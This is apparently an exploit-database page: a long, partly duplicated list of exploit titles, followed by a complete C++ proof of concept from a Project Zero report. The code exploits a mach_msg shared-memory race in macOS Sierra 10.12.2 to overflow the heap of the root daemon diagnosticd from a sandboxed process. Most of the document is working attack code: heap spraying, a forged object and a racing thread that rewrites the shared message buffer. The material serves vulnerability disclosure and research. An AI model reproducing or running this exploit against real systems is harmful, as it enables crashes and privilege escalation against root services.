6d17bc529d
4 new exploits dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC) dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC) Spider Solitaire - Denial of Service (PoC) Spider Solitaire - Denial of Service (PoC) Baby FTP Server 1.24 - Denial of Service Baby FTP Server 1.24 - Denial of Service (1) Baby FTP server 1.24 - Denial of Service Baby FTP server 1.24 - Denial of Service (2) Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation Evostream Media Server 1.7.1 (x64) - Denial of Service Evostream Media Server 1.7.1 (x64) - Denial of Service Cerberus FTP Server 8.0.10.1 - Denial of Service Cerberus FTP Server 8.0.10.1 - Denial of Service Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow Solaris 10 sysinfo() - Local Kernel Memory Disclosure Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1) Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC) Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC) Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2) Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1) Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1) Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1) dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1) Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1) Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2) EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1) Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2) Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2) Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2) EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2) D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1) D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit) Azure Data Expert Ultimate 2.2.16 - Buffer Overflow Azure Data Expert Ultimate 2.2.16 - Buffer Overflow Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) Article Script 1.6.3 - 'rss.php' SQL Injection (1) Article Script 1.6.3 - 'rss.php' SQL Injection DBHcms 1.1.4 - Remote File Inclusion DBHcms 1.1.4 - 'code' Remote File Inclusion LaserNet CMS 1.5 - SQL Injection (2) LaserNet CMS 1.5 - SQL Injection Clever Copy 3.0 - 'postview.php' SQL Injection (1) Clever Copy 3.0 - 'postview.php' SQL Injection phpAuction - 'profile.php' SQL Injection phpAuction - 'profile.php' SQL Injection (1) Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1) Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2) Matterdaddy Market 1.1 - Multiple SQL Injections (1) Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections PHPWebGallery 1.3.4 - Blind SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection (1) PHPWebGallery 1.3.4 - Blind SQL Injection PHPWebGallery 1.3.4 - Blind SQL Injection (2) Zeeways Shaadi Clone 2.0 - Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass (1) Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1) DBHcms 1.1.4 - Remote File Inclusion DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion E-book Store - Multiple Vulnerabilities (1) Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1) E-book Store - Multiple Vulnerabilities (2) E-book Store - Multiple Vulnerabilities Classifieds Script - SQL Injection Classifieds Script - 'rate' SQL Injection Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2) DBHcms 1.1.4 - SQL Injection DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection LaserNet CMS 1.5 - SQL Injection (1) Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2) Article Script 1.6.3 - 'rss.php' SQL Injection (2) Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1) Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1) LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2) Fonality trixbox 2.4.2 - Cross-Site Scripting Fonality trixbox 2.4.2 - Cross-Site Scripting (1) Fonality trixbox 2.4.2 - Cross-Site Scripting (2) Clever Copy 3.0 - 'postview.php' SQL Injection (2) phpAuction - 'profile.php' SQL Injection phpAuction - 'profile.php' SQL Injection (2) Zeeways Shaadi Clone 2.0 - Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass (2) DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2) Matterdaddy Market 1.1 - Multiple SQL Injections (2) Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections WordPress Plugin WP Private Messages 1.0.1 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1) Huawei Flybox B660 - Cross-Site Request Forgery Huawei Flybox B660 - Cross-Site Request Forgery (1) Huawei Flybox B660 - Cross-Site Request Forgery Huawei Flybox B660 - Cross-Site Request Forgery (2) Classifieds Script - SQL Injection Classifieds Script - 'term' SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)
261 lines
No EOL
16 KiB
C++
Executable file
261 lines
No EOL
16 KiB
C++
Executable file
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1083
|
|
|
|
When sending ool memory via |mach_msg| with |deallocate| flag or |MACH_MSG_VIRTUAL_COPY| flag, |mach_msg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a shared memory race condition.
|
|
|
|
Exploitation:
|
|
We need specific code that references the memory twice from |mach_msg|.
|
|
Here's a snippet of such a function |xpc_dictionary_insert|.
|
|
|
|
v14 = strlen(shared_memory); <<-- 1st
|
|
v15 = _xpc_malloc(v14 + 41);
|
|
...
|
|
strcpy((char *)(v15 + 32), shared_memory); <<-- 2nd
|
|
|
|
If we change the string's length bigger before |strcpy| is called, it will result in a heap overflow.
|
|
|
|
This bug is triggerable from a sandboxed process.
|
|
|
|
The attached PoC will crash diagnosticd(running as root). It requires more than 512MB memory to run.
|
|
|
|
Tested on macOS Sierra 10.12.2(16C67).
|
|
|
|
clang++ -o poc poc.cc -std=c++11
|
|
*/
|
|
|
|
/*
|
|
macOS/IOS: mach_msg: doesn't copy memory
|
|
|
|
When sending ool memory via |mach_msg| with |deallocate| flag or |MACH_MSG_VIRTUAL_COPY| flag, |mach_msg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a shared memory race condition.
|
|
|
|
Exploitation:
|
|
We need specific code that references the memory twice from |mach_msg|.
|
|
Here's a snippet of such a function |xpc_dictionary_insert|.
|
|
|
|
v14 = strlen(shared_memory); <<-- 1st
|
|
v15 = _xpc_malloc(v14 + 41);
|
|
...
|
|
strcpy((char *)(v15 + 32), shared_memory); <<-- 2nd
|
|
|
|
If we change the string's length bigger before |strcpy| is called, it will result in a heap overflow.
|
|
|
|
This bug is triggerable from a sandboxed process.
|
|
|
|
The attached PoC will crash diagnosticd(running as root). It requires more than 512MB memory to run.
|
|
|
|
Tested on macOS Sierra 10.12.2(16C67).
|
|
|
|
clang++ -o poc poc.cc -std=c++11
|
|
|
|
*/
|
|
|
|
#include <stdint.h>
|
|
#include <stdio.h>
|
|
#include <xpc/xpc.h>
|
|
#include <assert.h>
|
|
#include <iostream>
|
|
#include <CoreFoundation/CoreFoundation.h>
|
|
#include <dlfcn.h>
|
|
#include <mach/mach.h>
|
|
#include <mach-o/dyld_images.h>
|
|
#include <printf.h>
|
|
#include <dispatch/dispatch.h>
|
|
|
|
#include <vector>
|
|
#include <chrono>
|
|
#include <thread>
|
|
|
|
struct RaceContext {
|
|
std::vector<uint8_t> payload;
|
|
size_t race_offset;
|
|
|
|
std::vector<uint8_t> spray;
|
|
size_t spray_size;
|
|
};
|
|
|
|
xpc_object_t empty_request = xpc_dictionary_create(nullptr, nullptr, 0);
|
|
|
|
double now() {
|
|
return std::chrono::duration<double>(std::chrono::system_clock::now().time_since_epoch()).count();
|
|
}
|
|
|
|
mach_port_t createMemoryEntry(memory_object_size_t size) {
|
|
vm_address_t addr = 0;
|
|
vm_allocate(mach_task_self(), &addr, size, true);
|
|
|
|
memset((void*)addr, 0, size);
|
|
|
|
mach_port_t res = 0;
|
|
mach_make_memory_entry_64(mach_task_self(), &size, addr, 0x0000000000200043, &res, 0);
|
|
|
|
vm_deallocate(mach_task_self(), addr, size);
|
|
|
|
return res;
|
|
}
|
|
|
|
void sendPayload(const RaceContext* ctx) {
|
|
size_t data_size = ctx->spray_size;
|
|
|
|
mach_port_t mem_entry = createMemoryEntry(data_size);
|
|
|
|
uint8_t* data = nullptr;
|
|
vm_map(mach_task_self(), (vm_address_t*)&data, data_size, 0LL, 1, mem_entry, 0LL, 0, 67, 67, 2u);
|
|
|
|
memcpy(data, &ctx->payload[0], ctx->payload.size());
|
|
|
|
for (size_t i = 0x1000; i < data_size; i += 0x1000) {
|
|
memcpy(&data[i], &ctx->spray[0], ctx->spray.size());
|
|
}
|
|
|
|
for (int32_t i = 0; i < 0x4000; i++) {
|
|
double start = now();
|
|
|
|
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.diagnosticd", NULL, 0);
|
|
xpc_connection_set_event_handler(client, ^(xpc_object_t event) {
|
|
|
|
});
|
|
xpc_connection_resume(client);
|
|
xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request));
|
|
|
|
double duration = now() - start;
|
|
printf("duration: %f\n", duration);
|
|
|
|
if (duration > 2.0) {
|
|
xpc_release(client);
|
|
break;
|
|
}
|
|
|
|
mach_port_t service_port = ((uint32_t*)client)[15];
|
|
|
|
void* msg_data = nullptr;
|
|
vm_map(mach_task_self(), (vm_address_t*)&msg_data, data_size, 0LL, 1, mem_entry, 0LL, 0, 67, 67, 2u);
|
|
|
|
struct {
|
|
mach_msg_header_t hdr;
|
|
mach_msg_body_t body;
|
|
mach_msg_ool_descriptor_t ool_desc;
|
|
} m = {};
|
|
|
|
m.hdr.msgh_size = sizeof(m);
|
|
m.hdr.msgh_local_port = MACH_PORT_NULL;
|
|
m.hdr.msgh_remote_port = service_port;
|
|
m.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);
|
|
m.hdr.msgh_id = 0x10000000;
|
|
|
|
m.body.msgh_descriptor_count = 1;
|
|
|
|
m.ool_desc.type = MACH_MSG_OOL_DESCRIPTOR;
|
|
m.ool_desc.address = msg_data;
|
|
m.ool_desc.size = (mach_msg_size_t)data_size;
|
|
m.ool_desc.deallocate = 1;
|
|
m.ool_desc.copy = MACH_MSG_VIRTUAL_COPY;
|
|
|
|
bool stop = true;
|
|
std::thread syncer([&] {
|
|
while (stop);
|
|
xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request));
|
|
stop = true;
|
|
});
|
|
|
|
size_t race_offset = ctx->race_offset;
|
|
__uint128_t orig = *(__uint128_t*)&data[race_offset];
|
|
__uint128_t new_one = *(const __uint128_t*)"AAAAAAAAAAAAAAAA";
|
|
|
|
mach_msg(&m.hdr, MACH_SEND_MSG, m.hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
|
|
|
|
stop = false;
|
|
while (!stop) {
|
|
*(__uint128_t*)&data[race_offset] = orig;
|
|
*(__uint128_t*)&data[race_offset] = new_one;
|
|
}
|
|
|
|
syncer.join();
|
|
*(__uint128_t*)&data[race_offset] = orig;
|
|
|
|
xpc_release(client);
|
|
}
|
|
|
|
mach_port_deallocate(mach_task_self(), mem_entry);
|
|
}
|
|
|
|
const void* memSearch(const void* base, const void* data, size_t size) {
|
|
const uint8_t* p = (const uint8_t*)base;
|
|
for (;;) {
|
|
if (!memcmp(p, data, size))
|
|
return p;
|
|
|
|
p++;
|
|
}
|
|
}
|
|
|
|
void* getLibraryAddress(const char* library_name) {
|
|
task_dyld_info_data_t task_dyld_info;
|
|
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
|
|
|
|
task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
|
|
|
|
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
|
|
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
|
|
|
|
for (size_t i = 0; i < all_image_infos->infoArrayCount; i++) {
|
|
const char* image_name = image_infos[i].imageFilePath;
|
|
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
|
|
if (strstr(image_name, library_name)){
|
|
return (void*)image_load_address;
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
void initRace(RaceContext* ctx) {
|
|
struct FakeObject {
|
|
void* unk[2];
|
|
void* ref_to_bucket;
|
|
void* padd[0x10];
|
|
struct {
|
|
const void* sel;
|
|
const void* func;
|
|
} bucket;
|
|
};
|
|
|
|
const uint32_t kXpcData[] = {0x58504321, 0x00000005, 0x0000f000, 0x00000964, 0x00000002, 0x69746361, 0x00006e6f, 0x00004000, 0x00000003, 0x00000000, 0x73646970, 0x00000000, 0x0000e000, 0x0000093c, 0x00000001, 0x0000f000, 0x00000930, 0x0000004b, 0x00003041, 0x0000f000, 0x00000004, 0x00000000, 0x00003141, 0x0000f000, 0x00000004, 0x00000000, 0x00003241, 0x0000f000, 0x00000004, 0x00000000, 0x00003341, 0x0000f000, 0x00000004, 0x00000000, 0x00003441, 0x0000f000, 0x00000004, 0x00000000, 0x00003541, 0x0000f000, 0x00000004, 0x00000000, 0x00003641, 0x0000f000, 0x00000004, 0x00000000, 0x00003741, 0x0000f000, 0x00000004, 0x00000000, 0x00003841, 0x0000f000, 0x00000004, 0x00000000, 0x00003941, 0x0000f000, 0x00000004, 0x00000000, 0x00303141, 0x0000f000, 0x00000004, 0x00000000, 0x00313141, 0x0000f000, 0x00000004, 0x00000000, 0x00323141, 0x0000f000, 0x00000004, 0x00000000, 0x00333141, 0x0000f000, 0x00000004, 0x00000000, 0x00343141, 0x0000f000, 0x00000004, 0x00000000, 0x00353141, 0x0000f000, 0x00000004, 0x00000000, 0x00363141, 0x0000f000, 0x00000004, 0x00000000, 0x00373141, 0x0000f000, 0x00000004, 0x00000000, 0x00383141, 0x0000f000, 0x00000004, 0x00000000, 0x00393141, 0x0000f000, 0x00000004, 0x00000000, 0x00303241, 0x0000f000, 0x00000004, 0x00000000, 0x00313241, 0x0000f000, 0x00000004, 0x00000000, 0x00323241, 0x0000f000, 0x00000004, 0x00000000, 0x00333241, 0x0000f000, 0x00000004, 0x00000000, 0x00343241, 0x0000f000, 0x00000004, 0x00000000, 0x00353241, 0x0000f000, 0x00000004, 0x00000000, 0x00363241, 0x0000f000, 0x00000004, 0x00000000, 0x00373241, 0x0000f000, 0x00000004, 0x00000000, 0x00383241, 0x0000f000, 0x00000004, 0x00000000, 0x00393241, 0x0000f000, 0x00000004, 0x00000000, 0x00303341, 0x0000f000, 0x00000004, 0x00000000, 0x00313341, 0x0000f000, 0x00000004, 0x00000000, 0x00323341, 0x0000f000, 0x00000004, 0x00000000, 0x00333341, 0x0000f000, 0x00000004, 0x00000000, 0x00343341, 0x0000f000, 0x00000004, 0x00000000, 0x00353341, 0x0000f000, 0x00000004, 0x00000000, 0x00363341, 0x0000f000, 0x00000004, 0x00000000, 0x00373341, 0x0000f000, 0x00000004, 0x00000000, 0x00383341, 0x0000f000, 0x00000004, 0x00000000, 0x00393341, 0x0000f000, 0x00000004, 0x00000000, 0x00303441, 0x0000f000, 0x00000004, 0x00000000, 0x00313441, 0x0000f000, 0x00000004, 0x00000000, 0x00323441, 0x0000f000, 0x00000004, 0x00000000, 0x00333441, 0x0000f000, 0x00000004, 0x00000000, 0x00343441, 0x0000f000, 0x00000004, 0x00000000, 0x00353441, 0x0000f000, 0x00000004, 0x00000000, 0x00363441, 0x0000f000, 0x00000004, 0x00000000, 0x00373441, 0x0000f000, 0x00000004, 0x00000000, 0x00383441, 0x0000f000, 0x00000004, 0x00000000, 0x00393441, 0x0000f000, 0x00000004, 0x00000000, 0x65746661, 0x00000072, 0x00004000, 0x00000001, 0x00000000, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x00515151, 0x0000f000, 0x00000004, 0x00000000, 0x65746661, 0x00000072, 0x0000f000, 0x00000324, 0x00000032, 0x00003041, 0x0000f000, 0x00000004, 0x00000000, 0x00003141, 0x0000f000, 0x00000004, 0x00000000, 0x00003241, 0x0000f000, 0x00000004, 0x00000000, 0x00003341, 0x0000f000, 0x00000004, 0x00000000, 0x00003441, 0x0000f000, 0x00000004, 0x00000000, 0x00003541, 0x0000f000, 0x00000004, 0x00000000, 0x00003641, 0x0000f000, 0x00000004, 0x00000000, 0x00003741, 0x0000f000, 0x00000004, 0x00000000, 0x00003841, 0x0000f000, 0x00000004, 0x00000000, 0x00003941, 0x0000f000, 0x00000004, 0x00000000, 0x00303141, 0x0000f000, 0x00000004, 0x00000000, 0x00313141, 0x0000f000, 0x00000004, 0x00000000, 0x00323141, 0x0000f000, 0x00000004, 0x00000000, 0x00333141, 0x0000f000, 0x00000004, 0x00000000, 0x00343141, 0x0000f000, 0x00000004, 0x00000000, 0x00353141, 0x0000f000, 0x00000004, 0x00000000, 0x00363141, 0x0000f000, 0x00000004, 0x00000000, 0x00373141, 0x0000f000, 0x00000004, 0x00000000, 0x00383141, 0x0000f000, 0x00000004, 0x00000000, 0x00393141, 0x0000f000, 0x00000004, 0x00000000, 0x00303241, 0x0000f000, 0x00000004, 0x00000000, 0x00313241, 0x0000f000, 0x00000004, 0x00000000, 0x00323241, 0x0000f000, 0x00000004, 0x00000000, 0x00333241, 0x0000f000, 0x00000004, 0x00000000, 0x00343241, 0x0000f000, 0x00000004, 0x00000000, 0x00353241, 0x0000f000, 0x00000004, 0x00000000, 0x00363241, 0x0000f000, 0x00000004, 0x00000000, 0x00373241, 0x0000f000, 0x00000004, 0x00000000, 0x00383241, 0x0000f000, 0x00000004, 0x00000000, 0x00393241, 0x0000f000, 0x00000004, 0x00000000, 0x00303341, 0x0000f000, 0x00000004, 0x00000000, 0x00313341, 0x0000f000, 0x00000004, 0x00000000, 0x00323341, 0x0000f000, 0x00000004, 0x00000000, 0x00333341, 0x0000f000, 0x00000004, 0x00000000, 0x00343341, 0x0000f000, 0x00000004, 0x00000000, 0x00353341, 0x0000f000, 0x00000004, 0x00000000, 0x00363341, 0x0000f000, 0x00000004, 0x00000000, 0x00373341, 0x0000f000, 0x00000004, 0x00000000, 0x00383341, 0x0000f000, 0x00000004, 0x00000000, 0x00393341, 0x0000f000, 0x00000004, 0x00000000, 0x00303441, 0x0000f000, 0x00000004, 0x00000000, 0x00313441, 0x0000f000, 0x00000004, 0x00000000, 0x00323441, 0x0000f000, 0x00000004, 0x00000000, 0x00333441, 0x0000f000, 0x00000004, 0x00000000, 0x00343441, 0x0000f000, 0x00000004, 0x00000000, 0x00353441, 0x0000f000, 0x00000004, 0x00000000, 0x00363441, 0x0000f000, 0x00000004, 0x00000000, 0x00373441, 0x0000f000, 0x00000004, 0x00000000, 0x00383441, 0x0000f000, 0x00000004, 0x00000000, 0x00393441, 0x0000f000, 0x00000004, 0x00000000, 0x00003042, 0x0000f000, 0x00000004, 0x00000000, 0x00003142, 0x0000f000, 0x00000004, 0x00000000, 0x00003242, 0x0000f000, 0x00000004, 0x00000000, 0x00003342, 0x0000f000, 0x00000004, 0x00000000, 0x00003442, 0x0000f000, 0x00000004, 0x00000000, 0x00003542, 0x0000f000, 0x00000004, 0x00000000, 0x00003642, 0x0000f000, 0x00000004, 0x00000000, 0x00003742, 0x0000f000, 0x00000004, 0x00000000, 0x00003842, 0x0000f000, 0x00000004, 0x00000000, 0x00003942, 0x0000f000, 0x00000004, 0x00000000, 0x00303142, 0x0000f000, 0x00000004, 0x00000000, 0x00313142, 0x0000f000, 0x00000004, 0x00000000, 0x00323142, 0x0000f000, 0x00000004, 0x00000000, 0x00333142, 0x0000f000, 0x00000004, 0x00000000, 0x00343142, 0x0000f000, 0x00000004, 0x00000000, 0x00353142, 0x0000f000, 0x00000004, 0x00000000, 0x00363142, 0x0000f000, 0x00000004, 0x00000000, 0x00373142, 0x0000f000, 0x00000004, 0x00000000, 0x00383142, 0x0000f000, 0x00000004, 0x00000000, 0x00393142, 0x0000f000, 0x00000004, 0x00000000, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x00515151, 0x00008000, 0x00000009, 0x68746d69, 0x67617465, 0x00000000, 0x65746661, 0x00000072, 0x0000f000, 0x00000004, 0x00000000};
|
|
const size_t kTagOffset = 0x954;
|
|
const uintptr_t kSprayedAddr = 0x120101010;
|
|
|
|
//ctx->data.resize(0x10000);
|
|
ctx->payload.resize(0x1000);
|
|
ctx->race_offset = kTagOffset - 0x10;
|
|
|
|
memcpy(&ctx->payload[0], kXpcData, sizeof(kXpcData));
|
|
*(uintptr_t*)&ctx->payload[kTagOffset] = kSprayedAddr;
|
|
|
|
ctx->spray.resize(0x300);
|
|
ctx->spray_size = 1024 * 1024 * 512;
|
|
|
|
void* libdispatch = getLibraryAddress("libdispatch.dylib");
|
|
|
|
FakeObject* predict = (FakeObject*)kSprayedAddr;
|
|
FakeObject* obj = (FakeObject*)&ctx->spray[kSprayedAddr & 0xff];
|
|
obj->ref_to_bucket = &predict->bucket;
|
|
obj->bucket.sel = memSearch(libdispatch, "_xref_dispose", 14);
|
|
obj->bucket.func = (void*)0x9999;
|
|
}
|
|
|
|
int32_t main() {
|
|
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.diagnosticd", NULL, 0);
|
|
xpc_connection_set_event_handler(client, ^(xpc_object_t event) {
|
|
|
|
});
|
|
xpc_connection_resume(client);
|
|
xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request));
|
|
|
|
RaceContext ctx;
|
|
initRace(&ctx);
|
|
|
|
printf("attach the debugger to diagnosticd\n");
|
|
getchar();
|
|
|
|
sendPayload(&ctx);
|
|
|
|
return 0;
|
|
} |